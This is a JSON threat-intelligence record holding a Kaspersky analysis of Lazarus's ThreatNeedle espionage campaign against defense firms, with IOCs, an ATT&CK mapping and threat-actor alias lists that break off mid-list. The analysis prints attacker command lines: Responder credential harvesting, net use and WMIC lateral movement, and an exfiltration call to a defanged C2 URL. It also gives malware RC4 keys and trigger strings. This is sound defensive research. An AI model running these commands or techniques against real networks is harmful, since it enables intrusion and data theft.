{
	"id": "5e31198e-b39a-4578-8a8d-0b5aeb2913bd",
	"created_at": "2026-04-06T00:11:27.60329Z",
	"updated_at": "2026-04-10T03:38:19.498402Z",
	"deleted_at": null,
	"sha1_hash": "392c0d65d86c9e8426d91d0d082485dcbb8c082a",
	"title": "Lazarus targets defense industry with ThreatNeedle",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2891864,
	"plain_text": "Lazarus targets defense industry with ThreatNeedle\r\nBy Vyacheslav Kopeytsev\r\nPublished: 2021-02-25 · Archived: 2026-04-02 10:49:44 UTC\r\nLazarus targets defense industry with ThreatNeedle (PDF)\r\nWe named Lazarus the most active group of 2020. We’ve observed numerous activities by this notorious APT\r\ngroup targeting various industries. The group has changed target depending on the primary objective. Google TAG\r\nhas recently published a post about a campaign by Lazarus targeting security researchers. After taking a closer\r\nlook, we identified the malware used in those attacks as belonging to a family that we call ThreatNeedle. We have\r\nseen Lazarus attack various industries using this malware cluster before. In mid-2020, we realized that Lazarus\r\nwas launching attacks on the defense industry using the ThreatNeedle cluster, an advanced malware cluster of\r\nManuscrypt (a.k.a. NukeSped). While investigating this activity, we were able to observe the complete life cycle\r\nof an attack, uncovering more technical details and links to the group’s other campaigns.\r\nThe group made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal\r\ninformation gathered using publicly available sources. After gaining an initial foothold, the attackers gathered\r\ncredentials and moved laterally, seeking crucial assets in the victim environment. We observed how they overcame\r\nnetwork segmentation by gaining access to an internal router machine and configuring it as a proxy server,\r\nallowing them to exfiltrate stolen data from the intranet network to their remote server. So far organizations in\r\nmore than a dozen countries have been affected.\r\nDuring this investigation we had a chance to look into the command-and-control infrastructure. The attackers\r\nconfigured multiple C2 servers for various stages, reusing several scripts we’ve seen in previous attacks by the\r\ngroup. 
Moreover, based on the insights so far, it was possible to figure out the relationship with other Lazarus\r\ngroup campaigns.\r\nThe full article is available on Kaspersky Threat Intelligence. Customers of Kaspersky Intelligence reporting may\r\ncontact: intelreports@kaspersky.com\r\nFor more information please contact: ics-cert@kaspersky.com\r\nInitial infection\r\nIn this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group\r\nstudied publicly available information about the targeted organization and identified email addresses belonging to\r\nvarious departments of the company.\r\nEmail addresses in those departments received phishing emails that either had a malicious Word document\r\nattached or a link to one hosted on a remote server. The phishing emails claimed to have urgent updates on today’s\r\nhottest topic – COVID-19 infections. The phishing emails were carefully crafted and written on behalf of a\r\nmedical center that is part of the organization under attack.\r\nhttps://securelist.com/lazarus-threatneedle/100803/\r\nPage 1 of 20\n\nPhishing email with links to malicious documents\r\nThe attackers registered accounts with a public email service, making sure the sender’s email addresses looked\r\nsimilar to the medical center’s real email address. The signature shown in the phishing emails included the actual\r\npersonal data of the deputy head doctor of the attacked organization’s medical center. 
The attackers were able to\r\nfind this information on the medical center’s public website.\r\nA macro in the Microsoft Word document contained the malicious code designed to download and execute\r\nadditional malicious software on the infected system.\r\nThe document contains information on the population health assessment program and is not directly related to the\r\nsubject of the phishing email (COVID-19), suggesting the attackers may not completely understand the meaning\r\nof the contents they used.\r\nContents of malicious document\r\nThe content of the lure document was copied from an online post by a health clinic.\r\nOur investigation showed that the initial spear-phishing attempt was unsuccessful due to macros being disabled in\r\nthe Microsoft Office installation of the targeted systems. In order to persuade the target to allow the malicious\r\nmacro, the attacker sent another email showing how to enable macros in Microsoft Office.\r\nEmail with instructions on enabling macros #1\r\nAfter sending the above email with explanations, the attackers realized that the target was using a different version\r\nof Microsoft Office and therefore required a different procedure for enabling macros. The attackers subsequently\r\nsent another email showing the correct procedure in a screenshot with a Russian language pack.\r\nEmail with instructions on enabling macros #2\r\nThe content in the spear-phishing emails sent by the attackers from May 21 to May 26, 2020, did not contain any\r\ngrammatical mistakes. 
However, in subsequent emails the attackers made numerous errors, suggesting they may\r\nnot be native Russian speakers and were using translation tools.\r\nEmail containing several grammatical mistakes\r\nOn June 3, 2020, one of the malicious attachments was opened by employees and at 9:30 am local time the\r\nattackers gained remote control of the infected system.\r\nThis group also utilized different types of spear-phishing attack. One of the compromised hosts received several\r\nspear-phishing documents on May 19, 2020. The malicious file that was delivered, named\r\nBoeing_AERO_GS.docx, fetches a template from a remote server.\r\nHowever, no payload created by this malicious document could be discovered. We speculate that the infection\r\nfrom this malicious document failed for a reason unknown to us. A few days later, the same host opened a\r\ndifferent malicious document. The threat actor wiped these files from disk after the initial infection, meaning they\r\ncould not be obtained.\r\nNonetheless, a related malicious document with this malware was retrieved based on our telemetry. It creates a\r\npayload and shortcut file and then continues executing the payload by using the following command line\r\nparameters.\r\nPayload path: %APPDATA%\\Microsoft\\Windows\\lconcaches.db\r\nShortcut path: %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OneDrives.lnk\r\nCommand Line; please note that the string at the end is hard-coded, but different for each sample:\r\nexe [dllpath],Dispatch n2UmQ9McxUds2b29\r\nThe content of the decoy document depicts the job description of a generator/power industry engineer.\r\nDecoy document\r\nMalware implants\r\nUpon opening a malicious document and allowing the macro, the malware is dropped and proceeds to a multistage\r\ndeployment procedure. 
The malware used in this campaign belongs to a known malware cluster we named\r\nThreatNeedle. We attribute this malware family to the advanced version of Manuscrypt (a.k.a. NukeSped), a\r\nfamily belonging to the Lazarus group. We previously observed the Lazarus group utilizing this cluster when\r\nattacking cryptocurrency businesses and a mobile game company. Although the malware involved and the entire\r\ninfection process is known and has not changed dramatically compared to previous findings, the Lazarus group\r\ncontinued using ThreatNeedle malware aggressively in this campaign.\r\nInfection procedure\r\nThe payload created by the initial spear-phishing document loads the next stage as a backdoor running in-memory\r\n– the ThreatNeedle backdoor. ThreatNeedle offers functionality to control infected victims. The actor uses it to\r\ncarry out initial reconnaissance and deploy additional malware for lateral movement. When moving laterally, the\r\nactor uses ThreatNeedle installer-type malware in the process. This installer is responsible for implanting the next\r\nstage loader-type malware and registering it for auto-execution in order to achieve persistence. The ThreatNeedle\r\nloader-type malware exists in several variations and serves the primary purpose of loading the final stage of the\r\nThreatNeedle malware in-memory.\r\nThreatNeedle installer\r\nUpon launch, the malware decrypts an embedded string using RC4 (key: B6 B7 2D 8C 6B 5F 14 DF B1 38 A1 73\r\n89 C1 D2 C4) and compares it to “7486513879852“. If the user executes this malware without a command line\r\nparameter, the malware launches a legitimate calculator carrying a dark icon of the popular Avengers franchise.\r\nFurther into the infection process, the malware chooses a service name randomly from netsvc in order to use it for\r\nthe payload creation path. 
The malware then creates a file named bcdbootinfo.tlp in the system folder containing\r\nthe infection time and the random service name that is chosen. We’ve discovered that the malware operator checks\r\nthis file to see whether the remote host was infected and, if so, when the infection happened.\r\nIt then decrypts the embedded payload using the RC4 algorithm, saves it to an .xml extension with a randomly\r\ncreated five-character file name in the current directory and then copies it to the system folder with a .sys\r\nextension.\r\nThis final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key\r\n(3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows\r\nservice and launched. In addition, the malware saves the configuration data as a registry key encrypted in RC4:\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameConfig – Description\r\nThreatNeedle loader\r\nThis component is responsible for loading the final backdoor payload into memory. In order to do this, the\r\nmalware uses several techniques to decrypt its payload:\r\nLoading the payload from the registry.\r\nLoading the payload from itself after decrypting RC4 and decompression.\r\nLoading the payload from itself after decrypting AES and decompression.\r\nLoading the payload from itself after decompression.\r\nLoading the payload from itself after one-byte XORing.\r\nMost loader-style malware types check the command line parameter and only proceed with the malicious routine\r\nif an expected parameter is given. This is a common trait in ThreatNeedle loaders. The most common example\r\nwe’ve seen is similar to the ThreatNeedle installer – the malware decrypts an embedded string using RC4, and\r\ncompares it with the parameter “Sx6BrUk4v4rqBFBV” upon launch. If it matches, the malware begins decrypting\r\nits embedded payload using the same RC4 key. 
The decrypted payload is an archive file which is subsequently\r\ndecompressed in the process. Eventually, the ThreatNeedle malware spawns in memory.\r\nThe other variant of the loader prepares the next stage payload from the victim’s registry. As we can see from\r\nthe installer malware description, we suspect that the registry key was created by the installer component.\r\nRetrieved data from the registry is decrypted using RC4 and then decompressed. Eventually, it gets loaded into\r\nmemory and the export function is invoked.\r\nThreatNeedle backdoor\r\nThe final payload executed in memory is the actual ThreatNeedle backdoor. It has the following functionality to\r\ncontrol infected victim machines:\r\nManipulate files/directories\r\nSystem profiling\r\nControl backdoor processes\r\nEnter sleeping or hibernation mode\r\nUpdate backdoor configuration\r\nExecute received commands\r\nPost-exploitation phase\r\nFrom one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and\r\nmoved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a\r\ncompletely isolated network segment cut off from the internet by compromising a router virtual machine, as we\r\nexplain below under “Overcoming network segmentation“.\r\nJudging by the hosts that were infected with the ThreatNeedle backdoors post-exploitation, we speculate that the\r\nprimary intention of this attack is to steal intellectual property. Lastly, the stolen data gets exfiltrated using a\r\ncustom tool that will be described in the “Exfiltration” section. 
Below is a rough timeline of the compromise we\r\ninvestigated:\r\nTimeline of infected hosts\r\nCredential gathering\r\nDuring the investigation we discovered that the Responder tool was executed from one of the victim machines that\r\nhad received the spear-phishing document. One day after the initial infection, the malware operator placed the tool\r\nonto this host and executed it using the following command:\r\n[Responder file path] -i [IP address] -rPv\r\nSeveral days later, the attacker started to move laterally originating from this host. Therefore, we assess that the\r\nattacker succeeded in acquiring login credentials from this host and started using them for further malicious\r\nactivity.\r\nLateral movement\r\nAfter acquiring the login credentials, the actor started to move laterally from workstations to server hosts. Typical\r\nlateral movement methods were employed, using Windows commands. First, a network connection with a remote\r\nhost was established using the command “net use”.\r\nnet use \\\\[IP address]\\IPC$ “[password]” /u:”[user name]” \u003e $temp\\~tmp5936t.tmp 2\u003e\u00261″\r\nNext, the actor copied malware to the remote host using the Windows Management Instrumentation Command-line (WMIC).\r\nexe /node:[IP address] /user:”[user name]” /password:”[password]” PROCESS CALL CREATE “cmd.exe\r\n/c $appdata\\Adobe\\adobe.bat“\r\nexe /node:[IP address] /user:”[user name]” /password:”[password]” PROCESS CALL CREATE “cmd /c sc\r\nqueryex helpsvc \u003e $temp\\tmp001.dat“\r\nOvercoming network segmentation\r\nIn the course of this research, we identified another highly interesting technique used by the attackers for lateral\r\nmovement and exfiltration of stolen data. 
The enterprise network under attack was divided into two segments:\r\ncorporate (a network on which computers had internet access) and restricted (a network on which computers\r\nhosted sensitive data and had no internet access). According to corporate policies, no transfer of information was\r\nallowed between these two segments. In other words, the two segments were meant to be completely separated.\r\nInitially, the attackers were able to get access to systems with internet access and spent a long time distributing\r\nmalware between machines in the network’s corporate segment. Among the compromised machines were those\r\nused by the administrators of the enterprise’s IT infrastructure.\r\nIt is worth noting that the administrators could connect both to the corporate and the restricted network segments\r\nto maintain systems and provide users with technical support in both zones. As a result, by gaining control of\r\nadministrator workstations the attackers were able to access the restricted network segment.\r\nHowever, since directly routing traffic between the segments was not possible, the attackers couldn’t use their\r\nstandard malware set to exfiltrate data from the restricted segment to the C2.\r\nThe situation changed on July 2 when the attackers managed to obtain the credentials for the router used by the\r\nadministrators to connect to systems in both segments. The router was a virtual machine running CentOS to route\r\ntraffic between several network interfaces based on predefined rules.\r\nConnection layout between victim’s network segments\r\nAccording to the evidence collected, the attackers scanned the router’s ports and detected a Webmin interface.\r\nNext, the attackers logged in to the web interface using a privileged root account. 
It’s unknown how the attackers\r\nwere able to obtain the credentials for that account, but it’s possible the credentials were saved in one of the\r\ninfected system’s browser password managers.\r\nLog listing Webmin web interface logins\r\nBy gaining access to the configuration panel the attackers configured the Apache web server and started using the\r\nrouter as a proxy server between the organization’s corporate and restricted segments.\r\nList of services used on the router\r\nSeveral days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTY PSCP\r\n(the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware\r\nto the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the\r\nenterprise network, using the router to host the samples. In addition, malware running in the network’s restricted\r\nsegment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up\r\non the same router.\r\nNew connection layout after attacker’s intrusion\r\nIn the course of the investigation we identified malware samples with the hardcoded URL of the router used as a\r\nproxy server.\r\nHardcoded proxy address in the malware\r\nSince the attackers regularly deleted log files from the router, only a handful of commands entered at the\r\ncommand line via SSH could be recovered. An analysis of these commands shows that the attackers tried to\r\nreconfigure traffic routing using the route command.\r\nAttacker commands\r\nThe attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted\r\nsegment of the enterprise network. 
On September 27, the attackers started removing all traces of their activity\r\nfrom the router, using the logrotate utility to set up automatic deletion of log files.\r\nWebmin log\r\nExfiltration\r\nWe observed that the malware operator attempted to create SSH tunnels to a remote server located in South Korea\r\nfrom several compromised server hosts. They used a custom tunneling tool to achieve this. The tool receives four\r\nparameters: client IP address, client port, server IP address and server port. The tool offers basic functionality,\r\nforwarding client traffic to the server. In order to create a covert channel, the malware encrypts forwarded traffic\r\nusing trivial binary encryption.\r\nEncryption routine\r\nUsing the covert channel, the adversary copied data from the remote server over to the host using the PuTTY PSCP\r\ntool:\r\n%APPDATA%\\PBL\\unpack.tmp -pw [password] root@[IP address]:/tmp/cab0215\r\n%APPDATA%\\PBL\\cab0215.tmp\r\nAfter copying data from the server, the actor utilized the custom tool to exfiltrate stolen data to the remote server.\r\nThis malware looks like a legitimate VNC client and runs like one if it’s executed without any command line\r\nparameters.\r\nExecution of malware without parameters\r\nHowever, if this application is executed with specific command line parameters, it runs an alternate, malicious\r\nfunction. According to our telemetry, the actor executed this application with six parameters:\r\n%APPDATA%\\Comms\\Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA\r\nhxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp %APPDATA%\\Comms\\cab59.tmp\r\nFL0509 15000\r\nAlso, if the number of command line parameters is greater than six, the malware jumps into a malicious routine.\r\nThe malware also checks the length of the second argument – if it’s less than 29 characters, it terminates the\r\nexecution. 
When the parameter checking procedure has passed successfully, the malware starts to decrypt its next\r\npayload.\r\nThe embedded payload gets decrypted via XOR, where each byte from the end of the payload gets applied to the\r\npreceding byte. Next, the XORed blob receives the second command line argument that’s provided (in this case\r\nS0RMM-50QQE-F65DN-DCPYN-5QEQA). The malware can accept more command line arguments, and\r\ndepending on their number it runs differently. For example, it can also receive proxy server addresses with the “-p”\r\noption.\r\nWhen the decrypted in-memory payload is executed, it compares the header of the configuration data passed with\r\nthe string “0x8406” in order to confirm its validity. The payload opens a given file (in this example\r\n%APPDATA%\\Comms\\cab59.tmp) and starts exfiltrating it to the remote server. When the malware uploads data\r\nto the C2 server, it uses HTTP POST requests with two parameters named ‘fr’ and ‘fp’:\r\nThe ‘fr’ parameter contains the file name from the command line argument to upload.\r\nThe ‘fp’ parameter contains the base64 encoded size, CRC32 value of content and file contents.\r\nContents of fp parameter\r\nAttribution\r\nWe have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware\r\ncluster is attributed only to the Lazarus group. During this investigation, we were able to find connections to\r\nseveral clusters of the Lazarus group.\r\nConnections between Lazarus campaigns\r\nConnection with DeathNote cluster\r\nDuring this investigation we identified several connections with the DeathNote (a.k.a. Operation Dream Job)\r\ncluster of the Lazarus group. 
First of all, among the hosts infected by the ThreatNeedle malware, we discovered\r\none that was also infected with the DeathNote malware, and both threats used the same C2 server URLs.\r\nIn addition, while analyzing the C2 server used in this attack, we found a custom web shell script that was also\r\ndiscovered on the DeathNote C2 server. We also identified that the server script corresponding to the Trojanized\r\nVNC Uploader was found on the DeathNote C2 server.\r\nAlthough DeathNote and this incident show different TTPs, both campaigns share command and control\r\ninfrastructure and some victimology.\r\nConnection with Operation AppleJeus\r\nWe also found a connection with Operation AppleJeus. As we described, the actor used a homemade tunneling\r\ntool in the ThreatNeedle campaign that has a custom encryption routine to create a covert channel. This very same\r\ntool was utilized in operation AppleJeus as well.\r\nSame tunneling tool\r\nConnection with Bookcode cluster\r\nIn our previous blog about Lazarus group, we mentioned the Bookcode cluster attributed to Lazarus group; and\r\nrecently the Korea Internet and Security Agency (KISA) also published a report about the operation. In the report,\r\nthey mentioned a malware cluster named LPEClient used for profiling hosts and fetching next stage payloads.\r\nWhile investigating this incident, we also found LPEClient from the host infected with ThreatNeedle. So, we\r\nassess that the ThreatNeedle cluster is connected to the Bookcode operation.\r\nConclusions\r\nIn recent years, the Lazarus group has focused on attacking financial institutions around the world. However,\r\nbeginning in early 2020, they focused on aggressively attacking the defense industry. 
While Lazarus has also\r\npreviously utilized the ThreatNeedle malware used in this attack when targeting cryptocurrency businesses, it is\r\ncurrently being actively used in cyberespionage attacks.\r\nThis investigation allowed us to create strong ties between multiple campaigns that Lazarus has conducted,\r\nreinforcing our attribution. In this campaign the Lazarus group demonstrated its sophistication level and ability to\r\ncircumvent the security measures they face during their attacks, such as network segmentation. We assess that\r\nLazarus is a highly prolific group, conducting several campaigns using different strategies. They shared tools and\r\ninfrastructure among these campaigns to accomplish their goals.\r\nKaspersky ICS CERT would like to thank Vasily Berdnikov (Kaspersky targeted attacks research group) for his\r\nhelp.\r\nAppendix I – Indicators of Compromise\r\nMalicious documents\r\nInstaller\r\nLoader\r\nRegistry Loader\r\nDownloader\r\nTrojanized VNC Uploader\r\nTunneling Tool\r\nLPEClient\r\nFile path\r\n%SYSTEMROOT%\\system32\\bcdbootinfo.tlp\r\n%SYSTEMROOT%\\system32\\Nwsapagent.sys\r\n%SYSTEMROOT%\\system32\\SRService.sys\r\n%SYSTEMROOT%\\system32\\NWCWorkstation.sys\r\n%SYSTEMROOT%\\system32\\WmdmPmSp.sys\r\n%SYSTEMROOT%\\system32\\PCAudit.sys\r\n%SYSTEMROOT%\\system32\\helpsvc.sys\r\nRegistry Path\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameConfig – Description\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\KernelConfig – SubVersion\r\nDomains and 
IPs\r\nSecond stage C2 address\r\nC2 URLs to exfiltrate files used by Trojanized VNC Uploader\r\nAppendix II – MITRE ATT\u0026CK Mapping\r\nTactic | Technique | Technique Name\r\nInitial Access | T1566.002 | Phishing: Spearphishing Link\r\nExecution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell\r\nExecution | T1204.002 | User Execution: Malicious File\r\nExecution | T1569.002 | System Services: Service Execution\r\nPersistence | T1543.003 | Create or Modify System Process: Windows Service\r\nPersistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nPrivilege Escalation | T1543.003 | Create or Modify System Process: Windows Service\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information\r\nDefense Evasion | T1070.002 | Clear Linux or Mac System Logs\r\nDefense Evasion | T1070.003 | Clear Command History\r\nDefense Evasion | T1070.004 | File Deletion\r\nDefense Evasion | T1036.003 | Masquerading: Rename System Utilities\r\nDefense Evasion | T1036.004 | Masquerading: Masquerade Task or Service\r\nDefense Evasion | T1112 | Modify Registry\r\nCredential Access | T1557.001 | LLMNR/NBT-NS Poisoning and SMB Relay\r\nDiscovery | T1135 | Network Share Discovery\r\nDiscovery | T1057 | Process Discovery\r\nDiscovery | T1016 | System Network Configuration Discovery\r\nDiscovery | T1033 | System Owner/User Discovery\r\nDiscovery | T1049 | System Network Connections Discovery\r\nDiscovery | T1082 | System Information Discovery\r\nDiscovery | T1083 | File and Directory Discovery\r\nDiscovery | T1007 | System Service Discovery\r\nLateral Movement | T1021.002 | SMB/Windows Admin Shares\r\nCollection | T1560.001 | Archive Collected Data: Archive via Utility\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols\r\nCommand and Control | T1132.002 | Non-Standard Encoding\r\nCommand and Control | T1104 | Multi-Stage Channels\r\nCommand and Control | T1572 | Protocol Tunneling\r\nCommand and Control | T1090.001 | Internal Proxy\r\nExfiltration | T1041 | Exfiltration Over C2 Channel\r\nSource: https://securelist.com/lazarus-threatneedle/100803/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/lazarus-threatneedle/100803/"
	],
	"report_names": [
		"100803"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "544ecd2c-82c9-417c-9d98-d1ae395df964",
			"created_at": "2025-10-29T02:00:52.035025Z",
			"updated_at": "2026-04-10T02:00:05.408558Z",
			"deleted_at": null,
			"main_name": "AppleJeus",
			"aliases": [
				"AppleJeus",
				"Gleaming Pisces",
				"Citrine Sleet",
				"UNC1720",
				"UNC4736"
			],
			"source_name": "MITRE:AppleJeus",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
